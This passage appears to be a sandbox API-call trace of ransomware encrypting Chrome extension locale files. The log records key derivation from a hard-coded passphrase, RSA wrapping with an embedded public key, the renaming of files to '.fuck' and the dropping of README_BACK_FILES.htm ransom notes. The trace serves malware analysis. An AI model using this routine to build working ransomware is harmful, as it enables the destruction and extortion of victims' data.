Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\messages.json"), bFailIfExists=0) returned 1 [0253.521] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\messages.json", dwFileAttributes=0x0) returned 1 [0253.521] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\messages.json.gsg")) returned 1 [0253.522] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\messages.json.fuck")) returned 1 [0253.523] CryptDestroyHash (hHash=0x29846a0) returned 1 [0253.523] CryptDestroyKey (hKey=0x2984fa0) returned 1 [0253.523] CryptReleaseContext (hProv=0x298d670, dwFlags=0x0) returned 1 [0253.523] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0253.523] FindClose (in: hFindFile=0x2985ba0 | out: hFindFile=0x2985ba0) returned 1 [0253.523] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\readme_back_files.htm")) returned 0xffffffff [0253.523] AreFileApisANSI () returned 1 [0253.524] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0253.524] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0253.524] GetFileType (hFile=0x5d50) returned 0x1 [0253.524] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0253.525] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0253.525] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985ba0 [0253.533] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0253.533] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0253.533] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0253.533] GetLastError () returned 0x0 [0253.533] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\messages.json")) returned 0x20 [0253.533] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\messages.json", dwFileAttributes=0x80) returned 1 [0253.534] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0253.534] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0253.535] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0253.535] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298d670) returned 1 [0253.537] CryptCreateHash (in: hProv=0x298d670, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0253.537] lstrlenA (lpString="FGwqCokLNUQpiwojosdrnbCWzMlQm") returned 29 [0253.537] CryptHashData (hHash=0x29846a0, pbData=0x28cb418, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0253.537] CryptDeriveKey (in: hProv=0x298d670, Algid=0x6610, hBaseData=0x29846a0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2984fa0) returned 1 [0253.537] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----l", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0253.537] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0253.537] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x29874b0) returned 1 [0253.538] CryptImportPublicKeyInfo (in: hCryptProv=0x29874b0, dwCertEncodingType=0x1, pInfo=0x2995760*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2995790*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2995798*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x29856e0) returned 1 [0253.538] CryptEncrypt (in: hKey=0x29856e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0253.538] CryptEncrypt (in: hKey=0x29856e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2987290*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2987290*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0253.538] WriteFile (in: hFile=0x5d60, lpBuffer=0x2987290*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2987290*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0253.539] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xfe, lpOverlapped=0x0) returned 1 [0253.541] CryptEncrypt (in: hKey=0x2984fa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xfe, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x100) returned 1 [0253.541] WriteFile (in: hFile=0x5d60, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x100, lpOverlapped=0x0) returned 1 [0253.541] CloseHandle (hObject=0x5d5c) returned 1 [0253.541] CloseHandle (hObject=0x5d60) returned 1 [0253.541] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\messages.json"), bFailIfExists=0) returned 1 [0253.554] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\messages.json", dwFileAttributes=0x0) returned 1 [0253.554] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\messages.json.gsg")) returned 1 [0253.555] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\messages.json.fuck")) returned 1 [0253.557] CryptDestroyHash (hHash=0x29846a0) returned 1 [0253.557] CryptDestroyKey (hKey=0x2984fa0) returned 1 [0253.557] CryptReleaseContext (hProv=0x298d670, dwFlags=0x0) returned 1 [0253.557] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0253.557] FindClose (in: hFindFile=0x2985ba0 | out: hFindFile=0x2985ba0) returned 1 [0253.557] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\readme_back_files.htm")) returned 0xffffffff [0253.557] AreFileApisANSI () returned 1 [0253.558] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0253.558] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0253.558] GetFileType (hFile=0x5d50) returned 0x1 [0253.559] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0253.560] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0253.560] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985ba0 [0253.560] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0253.561] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0253.561] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0253.561] GetLastError () returned 0x0 [0253.561] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\messages.json")) returned 0x20 [0253.562] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\messages.json", dwFileAttributes=0x80) returned 1 [0253.562] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0253.563] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0253.564] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0253.565] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298d670) returned 1 [0253.567] CryptCreateHash (in: hProv=0x298d670, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0253.567] lstrlenA (lpString="FGwqCokLNUQpiwojosdrnbCWzMlQm") returned 29 [0253.567] CryptHashData (hHash=0x29846a0, pbData=0x28cb788, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0253.567] CryptDeriveKey (in: hProv=0x298d670, Algid=0x6610, hBaseData=0x29846a0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2984be0) returned 1 [0253.568] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----l", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0253.568] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0253.568] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2987c20) returned 1 [0253.568] CryptImportPublicKeyInfo (in: hCryptProv=0x2987c20, dwCertEncodingType=0x1, pInfo=0x2995b70*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2995ba0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2995ba8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x29852e0) returned 1 [0253.568] CryptEncrypt (in: hKey=0x29852e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0253.568] CryptEncrypt (in: hKey=0x29852e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2987648*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2987648*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0253.568] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2987648*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2987648*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0253.570] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xdb, lpOverlapped=0x0) returned 1 [0253.571] CryptEncrypt (in: hKey=0x2984be0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xdb, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0253.571] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0253.571] CloseHandle (hObject=0x5d60) returned 1 [0253.571] CloseHandle (hObject=0x5d5c) returned 1 [0253.571] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\messages.json"), bFailIfExists=0) returned 1 [0253.575] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\messages.json", dwFileAttributes=0x0) returned 1 [0253.576] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\messages.json.gsg")) returned 1 [0253.577] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\messages.json.fuck")) returned 1 [0253.578] CryptDestroyHash (hHash=0x29846a0) returned 1 [0253.578] CryptDestroyKey (hKey=0x2984be0) returned 1 [0253.578] CryptReleaseContext (hProv=0x298d670, dwFlags=0x0) returned 1 [0253.578] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0253.579] FindClose (in: hFindFile=0x2985ba0 | out: hFindFile=0x2985ba0) returned 1 [0253.579] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\readme_back_files.htm")) returned 0xffffffff [0253.579] AreFileApisANSI () returned 1 [0253.579] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0253.579] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0253.579] GetFileType (hFile=0x5d50) returned 0x1 [0253.580] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0253.581] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0253.581] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\*.*", lpFindFileData=0x2b9cd48 | out: 